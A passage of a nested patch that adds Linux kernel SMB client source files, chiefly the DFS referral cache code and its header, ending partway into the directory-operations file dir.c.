++	}
++
++	up_write(&htable_rw_lock);
++out:
++	free_dfs_info_array(refs, numrefs);
++	return rc;
++}
++
++/*
++ * Set up a DFS referral from a given cache entry.
++ *
++ * Must be called with htable_rw_lock held.
++ */
++static int setup_referral(const char *path, struct cache_entry *ce,
++			  struct dfs_info3_param *ref, const char *target)
++{
++	int rc;
++
++	cifs_dbg(FYI, "%s: set up new ref\n", __func__);
++
++	memset(ref, 0, sizeof(*ref));
++
++	ref->path_name = kstrdup(path, GFP_ATOMIC);
++	if (!ref->path_name)
++		return -ENOMEM;
++
++	ref->node_name = kstrdup(target, GFP_ATOMIC);
++	if (!ref->node_name) {
++		rc = -ENOMEM;
++		goto err_free_path;
++	}
++
++	ref->path_consumed = ce->path_consumed;
++	ref->ttl = ce->ttl;
++	ref->server_type = ce->srvtype;
++	ref->ref_flag = ce->ref_flags;
++	ref->flags = ce->hdr_flags;
++
++	return 0;
++
++err_free_path:
++	kfree(ref->path_name);
++	ref->path_name = NULL;
++	return rc;
++}
++
++/* Return target list of a DFS cache entry */
++static int get_targets(struct cache_entry *ce, struct dfs_cache_tgt_list *tl)
++{
++	int rc;
++	struct list_head *head = &tl->tl_list;
++	struct cache_dfs_tgt *t;
++	struct dfs_cache_tgt_iterator *it, *nit;
++
++	memset(tl, 0, sizeof(*tl));
++	INIT_LIST_HEAD(head);
++
++	list_for_each_entry(t, &ce->tlist, list) {
++		it = kzalloc(sizeof(*it), GFP_ATOMIC);
++		if (!it) {
++			rc = -ENOMEM;
++			goto err_free_it;
++		}
++
++		it->it_name = kstrdup(t->name, GFP_ATOMIC);
++		if (!it->it_name) {
++			kfree(it);
++			rc = -ENOMEM;
++			goto err_free_it;
++		}
++		it->it_path_consumed = t->path_consumed;
++
++		if (ce->tgthint == t)
++			list_add(&it->it_list, head);
++		else
++			list_add_tail(&it->it_list, head);
++	}
++
++	tl->tl_numtgts = ce->numtgts;
++
++	return 0;
++
++err_free_it:
++	list_for_each_entry_safe(it, nit, head, it_list) {
++		list_del(&it->it_list);
++		kfree(it->it_name);
++		kfree(it);
++	}
++	return rc;
++}
++
++/**
++ * dfs_cache_find - find a DFS cache entry
++ *
++ * If it doesn't find the cache entry, then it will get a DFS referral
++ * for @path and create a new entry.
++ *
++ * In case the cache entry exists but expired, it will get a DFS referral
++ * for @path and then update the respective cache entry.
++ *
++ * These parameters are passed down to the get_dfs_refer() call if it
++ * needs to be issued:
++ * @xid: syscall xid
++ * @ses: smb session to issue the request on
++ * @cp: codepage
++ * @remap: path character remapping type
++ * @path: path to lookup in DFS referral cache.
++ *
++ * @ref: when non-NULL, store single DFS referral result in it.
++ * @tgt_list: when non-NULL, store complete DFS target list in it.
++ *
++ * Return zero if the target was found, otherwise non-zero.
++ */
++int dfs_cache_find(const unsigned int xid, struct cifs_ses *ses, const struct nls_table *cp,
++		   int remap, const char *path, struct dfs_info3_param *ref,
++		   struct dfs_cache_tgt_list *tgt_list)
++{
++	int rc;
++	const char *npath;
++	struct cache_entry *ce;
++
++	npath = dfs_cache_canonical_path(path, cp, remap);
++	if (IS_ERR(npath))
++		return PTR_ERR(npath);
++
++	rc = cache_refresh_path(xid, ses, npath);
++	if (rc)
++		goto out_free_path;
++
++	down_read(&htable_rw_lock);
++
++	ce = lookup_cache_entry(npath);
++	if (IS_ERR(ce)) {
++		up_read(&htable_rw_lock);
++		rc = PTR_ERR(ce);
++		goto out_free_path;
++	}
++
++	if (ref)
++		rc = setup_referral(path, ce, ref, get_tgt_name(ce));
++	else
++		rc = 0;
++	if (!rc && tgt_list)
++		rc = get_targets(ce, tgt_list);
++
++	up_read(&htable_rw_lock);
++
++out_free_path:
++	kfree(npath);
++	return rc;
++}
++
++/**
++ * dfs_cache_noreq_find - find a DFS cache entry without sending any requests to
++ * the currently connected server.
++ *
++ * NOTE: This function will neither update a cache entry in case it was
++ * expired, nor create a new cache entry if @path hasn't been found. It heavily
++ * relies on an existing cache entry.
++ *
++ * @path: canonical DFS path to lookup in the DFS referral cache.
++ * @ref: when non-NULL, store single DFS referral result in it.
++ * @tgt_list: when non-NULL, store complete DFS target list in it.
++ *
++ * Return 0 if successful.
++ * Return -ENOENT if the entry was not found.
++ * Return non-zero for other errors.
++ */
++int dfs_cache_noreq_find(const char *path, struct dfs_info3_param *ref,
++			 struct dfs_cache_tgt_list *tgt_list)
++{
++	int rc;
++	struct cache_entry *ce;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
++
++	down_read(&htable_rw_lock);
++
++	ce = lookup_cache_entry(path);
++	if (IS_ERR(ce)) {
++		rc = PTR_ERR(ce);
++		goto out_unlock;
++	}
++
++	if (ref)
++		rc = setup_referral(path, ce, ref, get_tgt_name(ce));
++	else
++		rc = 0;
++	if (!rc && tgt_list)
++		rc = get_targets(ce, tgt_list);
++
++out_unlock:
++	up_read(&htable_rw_lock);
++	return rc;
++}
++
++/**
++ * dfs_cache_update_tgthint - update target hint of a DFS cache entry
++ *
++ * If it doesn't find the cache entry, then it will get a DFS referral for @path
++ * and create a new entry.
++ *
++ * In case the cache entry exists but expired, it will get a DFS referral
++ * for @path and then update the respective cache entry.
++ *
++ * @xid: syscall id
++ * @ses: smb session
++ * @cp: codepage
++ * @remap: type of character remapping for paths
++ * @path: path to lookup in DFS referral cache
++ * @it: DFS target iterator
++ *
++ * Return zero if the target hint was updated successfully, otherwise non-zero.
++ */
++int dfs_cache_update_tgthint(const unsigned int xid, struct cifs_ses *ses,
++			     const struct nls_table *cp, int remap, const char *path,
++			     const struct dfs_cache_tgt_iterator *it)
++{
++	struct cache_dfs_tgt *t;
++	struct cache_entry *ce;
++	const char *npath;
++	int rc = 0;
++
++	npath = dfs_cache_canonical_path(path, cp, remap);
++	if (IS_ERR(npath))
++		return PTR_ERR(npath);
++
++	cifs_dbg(FYI, "%s: update target hint - path: %s\n", __func__, npath);
++
++	rc = cache_refresh_path(xid, ses, npath);
++	if (rc)
++		goto out_free_path;
++
++	down_write(&htable_rw_lock);
++
++	ce = lookup_cache_entry(npath);
++	if (IS_ERR(ce)) {
++		rc = PTR_ERR(ce);
++		goto out_unlock;
++	}
++
++	t = ce->tgthint;
++
++	if (likely(!strcasecmp(it->it_name, t->name)))
++		goto out_unlock;
++
++	list_for_each_entry(t, &ce->tlist, list) {
++		if (!strcasecmp(t->name, it->it_name)) {
++			ce->tgthint = t;
++			cifs_dbg(FYI, "%s: new target hint: %s\n", __func__,
++				 it->it_name);
++			break;
++		}
++	}
++
++out_unlock:
++	up_write(&htable_rw_lock);
++out_free_path:
++	kfree(npath);
++	return rc;
++}
++
++/**
++ * dfs_cache_noreq_update_tgthint - update target hint of a DFS cache entry
++ * without sending any requests to the currently connected server.
++ *
++ * NOTE: This function will neither update a cache entry in case it was
++ * expired, nor create a new cache entry if @path hasn't been found. It heavily
++ * relies on an existing cache entry.
++ *
++ * @path: canonical DFS path to lookup in DFS referral cache.
++ * @it: target iterator which contains the target hint to update the cache
++ * entry with.
++ *
++ * Return zero if the target hint was updated successfully, otherwise non-zero.
++ */
++int dfs_cache_noreq_update_tgthint(const char *path, const struct dfs_cache_tgt_iterator *it)
++{
++	int rc;
++	struct cache_entry *ce;
++	struct cache_dfs_tgt *t;
++
++	if (!it)
++		return -EINVAL;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
++
++	down_write(&htable_rw_lock);
++
++	ce = lookup_cache_entry(path);
++	if (IS_ERR(ce)) {
++		rc = PTR_ERR(ce);
++		goto out_unlock;
++	}
++
++	rc = 0;
++	t = ce->tgthint;
++
++	if (unlikely(!strcasecmp(it->it_name, t->name)))
++		goto out_unlock;
++
++	list_for_each_entry(t, &ce->tlist, list) {
++		if (!strcasecmp(t->name, it->it_name)) {
++			ce->tgthint = t;
++			cifs_dbg(FYI, "%s: new target hint: %s\n", __func__,
++				 it->it_name);
++			break;
++		}
++	}
++
++out_unlock:
++	up_write(&htable_rw_lock);
++	return rc;
++}
++
++/**
++ * dfs_cache_get_tgt_referral - returns a DFS referral (@ref) from a given
++ * target iterator (@it).
++ *
++ * @path: canonical DFS path to lookup in DFS referral cache.
++ * @it: DFS target iterator.
++ * @ref: DFS referral pointer to set up the gathered information.
++ *
++ * Return zero if the DFS referral was set up correctly, otherwise non-zero.
++ */
++int dfs_cache_get_tgt_referral(const char *path, const struct dfs_cache_tgt_iterator *it,
++			       struct dfs_info3_param *ref)
++{
++	int rc;
++	struct cache_entry *ce;
++
++	if (!it || !ref)
++		return -EINVAL;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
++
++	down_read(&htable_rw_lock);
++
++	ce = lookup_cache_entry(path);
++	if (IS_ERR(ce)) {
++		rc = PTR_ERR(ce);
++		goto out_unlock;
++	}
++
++	cifs_dbg(FYI, "%s: target name: %s\n", __func__, it->it_name);
++
++	rc = setup_referral(path, ce, ref, it->it_name);
++
++out_unlock:
++	up_read(&htable_rw_lock);
++	return rc;
++}
++
++/**
++ * dfs_cache_add_refsrv_session - add SMB session of referral server
++ *
++ * @mount_id: mount group uuid to lookup.
++ * @ses: reference counted SMB session of referral server.
++ */
++void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses)
++{
++	struct mount_group *mg;
++
++	if (WARN_ON_ONCE(!mount_id || uuid_is_null(mount_id) || !ses))
++		return;
++
++	mg = get_mount_group(mount_id);
++	if (WARN_ON_ONCE(IS_ERR(mg)))
++		return;
++
++	spin_lock(&mg->lock);
++	if (mg->num_sessions < ARRAY_SIZE(mg->sessions))
++		mg->sessions[mg->num_sessions++] = ses;
++	spin_unlock(&mg->lock);
++	kref_put(&mg->refcount, mount_group_release);
++}
++
++/**
++ * dfs_cache_put_refsrv_sessions - put all referral server sessions
++ *
++ * Put all SMB sessions from the given mount group id.
++ *
++ * @mount_id: mount group uuid to lookup.
++ */
++void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id)
++{
++	struct mount_group *mg;
++
++	if (!mount_id || uuid_is_null(mount_id))
++		return;
++
++	mutex_lock(&mount_group_list_lock);
++	mg = find_mount_group_locked(mount_id);
++	if (IS_ERR(mg)) {
++		mutex_unlock(&mount_group_list_lock);
++		return;
++	}
++	mutex_unlock(&mount_group_list_lock);
++	kref_put(&mg->refcount, mount_group_release);
++}
++
++/* Extract share from DFS target and return a pointer to prefix path or NULL */
++static const char *parse_target_share(const char *target, char **share)
++{
++	const char *s, *seps = "/\\";
++	size_t len;
++
++	s = strpbrk(target + 1, seps);
++	if (!s)
++		return ERR_PTR(-EINVAL);
++
++	len = strcspn(s + 1, seps);
++	if (!len)
++		return ERR_PTR(-EINVAL);
++	s += len;
++
++	len = s - target + 1;
++	*share = kstrndup(target, len, GFP_KERNEL);
++	if (!*share)
++		return ERR_PTR(-ENOMEM);
++
++	s = target + len;
++	return s + strspn(s, seps);
++}
++
++/**
++ * dfs_cache_get_tgt_share - parse a DFS target
++ *
++ * @path: DFS full path
++ * @it: DFS target iterator.
++ * @share: tree name.
++ * @prefix: prefix path.
++ *
++ * Return zero if target was parsed correctly, otherwise non-zero.
++ */
++int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it, char **share,
++			    char **prefix)
++{
++	char sep;
++	char *target_share;
++	char *ppath = NULL;
++	const char *target_ppath, *dfsref_ppath;
++	size_t target_pplen, dfsref_pplen;
++	size_t len, c;
++
++	if (!it || !path || !share || !prefix || strlen(path) < it->it_path_consumed)
++		return -EINVAL;
++
++	sep = it->it_name[0];
++	if (sep != '\\' && sep != '/')
++		return -EINVAL;
++
++	target_ppath = parse_target_share(it->it_name, &target_share);
++	if (IS_ERR(target_ppath))
++		return PTR_ERR(target_ppath);
++
++	/* point to prefix in DFS referral path */
++	dfsref_ppath = path + it->it_path_consumed;
++	dfsref_ppath += strspn(dfsref_ppath, "/\\");
++
++	target_pplen = strlen(target_ppath);
++	dfsref_pplen = strlen(dfsref_ppath);
++
++	/* merge prefix paths from DFS referral path and target node */
++	if (target_pplen || dfsref_pplen) {
++		len = target_pplen + dfsref_pplen + 2;
++		ppath = kzalloc(len, GFP_KERNEL);
++		if (!ppath) {
++			kfree(target_share);
++			return -ENOMEM;
++		}
++		c = strscpy(ppath, target_ppath, len);
++		if (c && dfsref_pplen)
++			ppath[c] = sep;
++		strlcat(ppath, dfsref_ppath, len);
++	}
++	*share = target_share;
++	*prefix = ppath;
++	return 0;
++}
++
++static bool target_share_equal(struct TCP_Server_Info *server, const char *s1, const char *s2)
++{
++	char unc[sizeof("\\\\") + SERVER_NAME_LENGTH] = {0};
++	const char *host;
++	size_t hostlen;
++	char *ip = NULL;
++	struct sockaddr sa;
++	bool match;
++	int rc;
++
++	if (strcasecmp(s1, s2))
++		return false;
++
++	/*
++	 * Resolve share's hostname and check if server address matches.  Otherwise just ignore it
++	 * as we could not have upcall to resolve hostname or failed to convert ip address.
++	 */
++	match = true;
++	extract_unc_hostname(s1, &host, &hostlen);
++	scnprintf(unc, sizeof(unc), "\\\\%.*s", (int)hostlen, host);
++
++	rc = dns_resolve_server_name_to_ip(unc, &ip, NULL);
++	if (rc < 0) {
++		cifs_dbg(FYI, "%s: could not resolve %.*s. assuming server address matches.\n",
++			 __func__, (int)hostlen, host);
++		return true;
++	}
++
++	if (!cifs_convert_address(&sa, ip, strlen(ip))) {
++		cifs_dbg(VFS, "%s: failed to convert address \'%s\'. skip address matching.\n",
++			 __func__, ip);
++	} else {
++		cifs_server_lock(server);
++		match = cifs_match_ipaddr((struct sockaddr *)&server->dstaddr, &sa);
++		cifs_server_unlock(server);
++	}
++
++	kfree(ip);
++	return match;
++}
++
++/*
++ * Mark dfs tcon for reconnecting when the currently connected tcon does not match any of the new
++ * target shares in @refs.
++ */
++static void mark_for_reconnect_if_needed(struct cifs_tcon *tcon, struct dfs_cache_tgt_list *tl,
++					 const struct dfs_info3_param *refs, int numrefs)
++{
++	struct dfs_cache_tgt_iterator *it;
++	int i;
++
++	for (it = dfs_cache_get_tgt_iterator(tl); it; it = dfs_cache_get_next_tgt(tl, it)) {
++		for (i = 0; i < numrefs; i++) {
++			if (target_share_equal(tcon->ses->server, dfs_cache_get_tgt_name(it),
++					       refs[i].node_name))
++				return;
++		}
++	}
++
++	cifs_dbg(FYI, "%s: no cached or matched targets. mark dfs share for reconnect.\n", __func__);
++	cifs_signal_cifsd_for_reconnect(tcon->ses->server, true);
++}
++
++/* Refresh dfs referral of tcon and mark it for reconnect if needed */
++static int __refresh_tcon(const char *path, struct cifs_ses **sessions, struct cifs_tcon *tcon,
++			  bool force_refresh)
++{
++	struct cifs_ses *ses;
++	struct cache_entry *ce;
++	struct dfs_info3_param *refs = NULL;
++	int numrefs = 0;
++	bool needs_refresh = false;
++	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
++	int rc = 0;
++	unsigned int xid;
++
++	ses = find_ipc_from_server_path(sessions, path);
++	if (IS_ERR(ses)) {
++		cifs_dbg(FYI, "%s: could not find ipc session\n", __func__);
++		return PTR_ERR(ses);
++	}
++
++	down_read(&htable_rw_lock);
++	ce = lookup_cache_entry(path);
++	needs_refresh = force_refresh || IS_ERR(ce) || cache_entry_expired(ce);
++	if (!IS_ERR(ce)) {
++		rc = get_targets(ce, &tl);
++		if (rc)
++			cifs_dbg(FYI, "%s: could not get dfs targets: %d\n", __func__, rc);
++	}
++	up_read(&htable_rw_lock);
++
++	if (!needs_refresh) {
++		rc = 0;
++		goto out;
++	}
++
++	xid = get_xid();
++	rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
++	free_xid(xid);
++
++	/* Create or update a cache entry with the new referral */
++	if (!rc) {
++		dump_refs(refs, numrefs);
++
++		down_write(&htable_rw_lock);
++		ce = lookup_cache_entry(path);
++		if (IS_ERR(ce))
++			add_cache_entry_locked(refs, numrefs);
++		else if (force_refresh || cache_entry_expired(ce))
++			update_cache_entry_locked(ce, refs, numrefs);
++		up_write(&htable_rw_lock);
++
++		mark_for_reconnect_if_needed(tcon, &tl, refs, numrefs);
++	}
++
++out:
++	dfs_cache_free_tgts(&tl);
++	free_dfs_info_array(refs, numrefs);
++	return rc;
++}
++
++static int refresh_tcon(struct cifs_ses **sessions, struct cifs_tcon *tcon, bool force_refresh)
++{
++	struct TCP_Server_Info *server = tcon->ses->server;
++
++	mutex_lock(&server->refpath_lock);
++	if (server->origin_fullpath) {
++		if (server->leaf_fullpath && strcasecmp(server->leaf_fullpath,
++							server->origin_fullpath))
++			__refresh_tcon(server->leaf_fullpath + 1, sessions, tcon, force_refresh);
++		__refresh_tcon(server->origin_fullpath + 1, sessions, tcon, force_refresh);
++	}
++	mutex_unlock(&server->refpath_lock);
++
++	return 0;
++}
++
++/**
++ * dfs_cache_remount_fs - remount a DFS share
++ *
++ * Reconfigure dfs mount by forcing a new DFS referral and if the currently cached targets do not
++ * match any of the new targets, mark it for reconnect.
++ *
++ * @cifs_sb: cifs superblock.
++ *
++ * Return zero if remounted, otherwise non-zero.
++ */
++int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb)
++{
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct mount_group *mg;
++	struct cifs_ses *sessions[CACHE_MAX_ENTRIES + 1] = {NULL};
++	int rc;
++
++	if (!cifs_sb || !cifs_sb->master_tlink)
++		return -EINVAL;
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++	server = tcon->ses->server;
++
++	if (!server->origin_fullpath) {
++		cifs_dbg(FYI, "%s: not a dfs mount\n", __func__);
++		return 0;
++	}
++
++	if (uuid_is_null(&cifs_sb->dfs_mount_id)) {
++		cifs_dbg(FYI, "%s: no dfs mount group id\n", __func__);
++		return -EINVAL;
++	}
++
++	mutex_lock(&mount_group_list_lock);
++	mg = find_mount_group_locked(&cifs_sb->dfs_mount_id);
++	if (IS_ERR(mg)) {
++		mutex_unlock(&mount_group_list_lock);
++		cifs_dbg(FYI, "%s: no ipc session for refreshing referral\n", __func__);
++		return PTR_ERR(mg);
++	}
++	kref_get(&mg->refcount);
++	mutex_unlock(&mount_group_list_lock);
++
++	spin_lock(&mg->lock);
++	memcpy(&sessions, mg->sessions, mg->num_sessions * sizeof(mg->sessions[0]));
++	spin_unlock(&mg->lock);
++
++	/*
++	 * After reconnecting to a different server, unique ids won't match anymore, so we disable
++	 * serverino. This prevents dentry revalidation to think the dentry are stale (ESTALE).
++	 */
++	cifs_autodisable_serverino(cifs_sb);
++	/*
++	 * Force the use of prefix path to support failover on DFS paths that resolve to targets
++	 * that have different prefix paths.
++	 */
++	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
++	rc = refresh_tcon(sessions, tcon, true);
++
++	kref_put(&mg->refcount, mount_group_release);
++	return rc;
++}
++
++/*
++ * Refresh all active dfs mounts regardless of whether they are in cache or not.
++ * (cache can be cleared)
++ */
++static void refresh_mounts(struct cifs_ses **sessions)
++{
++	struct TCP_Server_Info *server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon, *ntcon;
++	struct list_head tcons;
++
++	INIT_LIST_HEAD(&tcons);
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++		spin_lock(&server->srv_lock);
++		if (!server->is_dfs_conn) {
++			spin_unlock(&server->srv_lock);
++			continue;
++		}
++		spin_unlock(&server->srv_lock);
++
++		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++				spin_lock(&tcon->tc_lock);
++				if (!tcon->ipc && !tcon->need_reconnect) {
++					tcon->tc_count++;
++					list_add_tail(&tcon->ulist, &tcons);
++				}
++				spin_unlock(&tcon->tc_lock);
++			}
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	list_for_each_entry_safe(tcon, ntcon, &tcons, ulist) {
++		struct TCP_Server_Info *server = tcon->ses->server;
++
++		list_del_init(&tcon->ulist);
++
++		mutex_lock(&server->refpath_lock);
++		if (server->origin_fullpath) {
++			if (server->leaf_fullpath && strcasecmp(server->leaf_fullpath,
++								server->origin_fullpath))
++				__refresh_tcon(server->leaf_fullpath + 1, sessions, tcon, false);
++			__refresh_tcon(server->origin_fullpath + 1, sessions, tcon, false);
++		}
++		mutex_unlock(&server->refpath_lock);
++
++		cifs_put_tcon(tcon);
++	}
++}
++
++static void refresh_cache(struct cifs_ses **sessions)
++{
++	int i;
++	struct cifs_ses *ses;
++	unsigned int xid;
++	char *ref_paths[CACHE_MAX_ENTRIES];
++	int count = 0;
++	struct cache_entry *ce;
++
++	/*
++	 * Refresh all cached entries.  Get all new referrals outside critical section to avoid
++	 * starvation while performing SMB2 IOCTL on broken or slow connections.
++
++	 * The cache entries may cover more paths than the active mounts
++	 * (e.g. domain-based DFS referrals or multi tier DFS setups).
++	 */
++	down_read(&htable_rw_lock);
++	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
++		struct hlist_head *l = &cache_htable[i];
++
++		hlist_for_each_entry(ce, l, hlist) {
++			if (count == ARRAY_SIZE(ref_paths))
++				goto out_unlock;
++			if (hlist_unhashed(&ce->hlist) || !cache_entry_expired(ce) ||
++			    IS_ERR(find_ipc_from_server_path(sessions, ce->path)))
++				continue;
++			ref_paths[count++] = kstrdup(ce->path, GFP_ATOMIC);
++		}
++	}
++
++out_unlock:
++	up_read(&htable_rw_lock);
++
++	for (i = 0; i < count; i++) {
++		char *path = ref_paths[i];
++		struct dfs_info3_param *refs = NULL;
++		int numrefs = 0;
++		int rc = 0;
++
++		if (!path)
++			continue;
++
++		ses = find_ipc_from_server_path(sessions, path);
++		if (IS_ERR(ses))
++			goto next_referral;
++
++		xid = get_xid();
++		rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
++		free_xid(xid);
++
++		if (!rc) {
++			down_write(&htable_rw_lock);
++			ce = lookup_cache_entry(path);
++			/*
++			 * We need to re-check it because other tasks might have it deleted or
++			 * updated.
++			 */
++			if (!IS_ERR(ce) && cache_entry_expired(ce))
++				update_cache_entry_locked(ce, refs, numrefs);
++			up_write(&htable_rw_lock);
++		}
++
++next_referral:
++		kfree(path);
++		free_dfs_info_array(refs, numrefs);
++	}
++}
++
++/*
++ * Worker that will refresh DFS cache and active mounts based on lowest TTL value from a DFS
++ * referral.
++ */
++static void refresh_cache_worker(struct work_struct *work)
++{
++	struct list_head mglist;
++	struct mount_group *mg, *tmp_mg;
++	struct cifs_ses *sessions[CACHE_MAX_ENTRIES + 1] = {NULL};
++	int max_sessions = ARRAY_SIZE(sessions) - 1;
++	int i = 0, count;
++
++	INIT_LIST_HEAD(&mglist);
++
++	/* Get refereces of mount groups */
++	mutex_lock(&mount_group_list_lock);
++	list_for_each_entry(mg, &mount_group_list, list) {
++		kref_get(&mg->refcount);
++		list_add(&mg->refresh_list, &mglist);
++	}
++	mutex_unlock(&mount_group_list_lock);
++
++	/* Fill in local array with an NULL-terminated list of all referral server sessions */
++	list_for_each_entry(mg, &mglist, refresh_list) {
++		if (i >= max_sessions)
++			break;
++
++		spin_lock(&mg->lock);
++		if (i + mg->num_sessions > max_sessions)
++			count = max_sessions - i;
++		else
++			count = mg->num_sessions;
++		memcpy(&sessions[i], mg->sessions, count * sizeof(mg->sessions[0]));
++		spin_unlock(&mg->lock);
++		i += count;
++	}
++
++	if (sessions[0]) {
++		/* Refresh all active mounts and cached entries */
++		refresh_mounts(sessions);
++		refresh_cache(sessions);
++	}
++
++	list_for_each_entry_safe(mg, tmp_mg, &mglist, refresh_list) {
++		list_del_init(&mg->refresh_list);
++		kref_put(&mg->refcount, mount_group_release);
++	}
++
++	spin_lock(&cache_ttl_lock);
++	queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
++	spin_unlock(&cache_ttl_lock);
++}
+diff --git a/fs/smb/client/dfs_cache.h b/fs/smb/client/dfs_cache.h
+new file mode 100644
+index 0000000000000..52070d1df1897
+--- /dev/null
++++ b/fs/smb/client/dfs_cache.h
+@@ -0,0 +1,97 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * DFS referral cache routines
++ *
++ * Copyright (c) 2018-2019 Paulo Alcantara <palcantara@suse.de>
++ */
++
++#ifndef _CIFS_DFS_CACHE_H
++#define _CIFS_DFS_CACHE_H
++
++#include <linux/nls.h>
++#include <linux/list.h>
++#include <linux/uuid.h>
++#include "cifsglob.h"
++
++#define DFS_CACHE_TGT_LIST_INIT(var) { .tl_numtgts = 0, .tl_list = LIST_HEAD_INIT((var).tl_list), }
++
++struct dfs_cache_tgt_list {
++	int tl_numtgts;
++	struct list_head tl_list;
++};
++
++struct dfs_cache_tgt_iterator {
++	char *it_name;
++	int it_path_consumed;
++	struct list_head it_list;
++};
++
++int dfs_cache_init(void);
++void dfs_cache_destroy(void);
++extern const struct proc_ops dfscache_proc_ops;
++
++int dfs_cache_find(const unsigned int xid, struct cifs_ses *ses, const struct nls_table *cp,
++		   int remap, const char *path, struct dfs_info3_param *ref,
++		   struct dfs_cache_tgt_list *tgt_list);
++int dfs_cache_noreq_find(const char *path, struct dfs_info3_param *ref,
++			 struct dfs_cache_tgt_list *tgt_list);
++int dfs_cache_update_tgthint(const unsigned int xid, struct cifs_ses *ses,
++			     const struct nls_table *cp, int remap, const char *path,
++			     const struct dfs_cache_tgt_iterator *it);
++int dfs_cache_noreq_update_tgthint(const char *path, const struct dfs_cache_tgt_iterator *it);
++int dfs_cache_get_tgt_referral(const char *path, const struct dfs_cache_tgt_iterator *it,
++			       struct dfs_info3_param *ref);
++int dfs_cache_get_tgt_share(char *path, const struct dfs_cache_tgt_iterator *it, char **share,
++			    char **prefix);
++void dfs_cache_put_refsrv_sessions(const uuid_t *mount_id);
++void dfs_cache_add_refsrv_session(const uuid_t *mount_id, struct cifs_ses *ses);
++char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap);
++int dfs_cache_remount_fs(struct cifs_sb_info *cifs_sb);
++
++static inline struct dfs_cache_tgt_iterator *
++dfs_cache_get_next_tgt(struct dfs_cache_tgt_list *tl,
++		       struct dfs_cache_tgt_iterator *it)
++{
++	if (!tl || list_empty(&tl->tl_list) || !it ||
++	    list_is_last(&it->it_list, &tl->tl_list))
++		return NULL;
++	return list_next_entry(it, it_list);
++}
++
++static inline struct dfs_cache_tgt_iterator *
++dfs_cache_get_tgt_iterator(struct dfs_cache_tgt_list *tl)
++{
++	if (!tl)
++		return NULL;
++	return list_first_entry_or_null(&tl->tl_list,
++					struct dfs_cache_tgt_iterator,
++					it_list);
++}
++
++static inline void dfs_cache_free_tgts(struct dfs_cache_tgt_list *tl)
++{
++	struct dfs_cache_tgt_iterator *it, *nit;
++
++	if (!tl || list_empty(&tl->tl_list))
++		return;
++	list_for_each_entry_safe(it, nit, &tl->tl_list, it_list) {
++		list_del(&it->it_list);
++		kfree(it->it_name);
++		kfree(it);
++	}
++	tl->tl_numtgts = 0;
++}
++
++static inline const char *
++dfs_cache_get_tgt_name(const struct dfs_cache_tgt_iterator *it)
++{
++	return it ? it->it_name : NULL;
++}
++
++static inline int
++dfs_cache_get_nr_tgts(const struct dfs_cache_tgt_list *tl)
++{
++	return tl ? tl->tl_numtgts : 0;
++}
++
++#endif /* _CIFS_DFS_CACHE_H */
+diff --git a/fs/smb/client/dir.c b/fs/smb/client/dir.c
+new file mode 100644
+index 0000000000000..e382b794acbed
+--- /dev/null
++++ b/fs/smb/client/dir.c
+@@ -0,0 +1,867 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   vfs operations that deal with dentries
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2009
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/stat.h>
++#include <linux/slab.h>
++#include <linux/namei.h>
++#include <linux/mount.h>
++#include <linux/file.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "fs_context.h"
++#include "cifs_ioctl.h"
++#include "fscache.h"
++
++static void
++renew_parental_timestamps(struct dentry *direntry)
++{
++	/* BB check if there is a way to get the kernel to do this or if we
++	   really need this */
++	do {
++		cifs_set_time(direntry, jiffies);
++		direntry = direntry->d_parent;
++	} while (!IS_ROOT(direntry));
++}
++
++char *
++cifs_build_path_to_root(struct smb3_fs_context *ctx, struct cifs_sb_info *cifs_sb,
++			struct cifs_tcon *tcon, int add_treename)
++{
++	int pplen = ctx->prepath ? strlen(ctx->prepath) + 1 : 0;
++	int dfsplen;
++	char *full_path = NULL;
++
++	/* if no prefix path, simply set path to the root of share to "" */
++	if (pplen == 0) {
++		full_path = kzalloc(1, GFP_KERNEL);
++		return full_path;
++	}
++
++	if (add_treename)
++		dfsplen = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1);
++	else
++		dfsplen = 0;
++
++	full_path = kmalloc(dfsplen + pplen + 1, GFP_KERNEL);
++	if (full_path == NULL)
++		return full_path;
++
++	if (dfsplen)
++		memcpy(full_path, tcon->tree_name, dfsplen);
++	full_path[dfsplen] = CIFS_DIR_SEP(cifs_sb);
++	memcpy(full_path + dfsplen + 1, ctx->prepath, pplen);
++	convert_delimiter(full_path, CIFS_DIR_SEP(cifs_sb));
++	return full_path;
++}
++
++/* Note: caller must free return buffer */
++const char *
++build_path_from_dentry(struct dentry *direntry, void *page)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	bool prefix = tcon->Flags & SMB_SHARE_IS_IN_DFS;
++
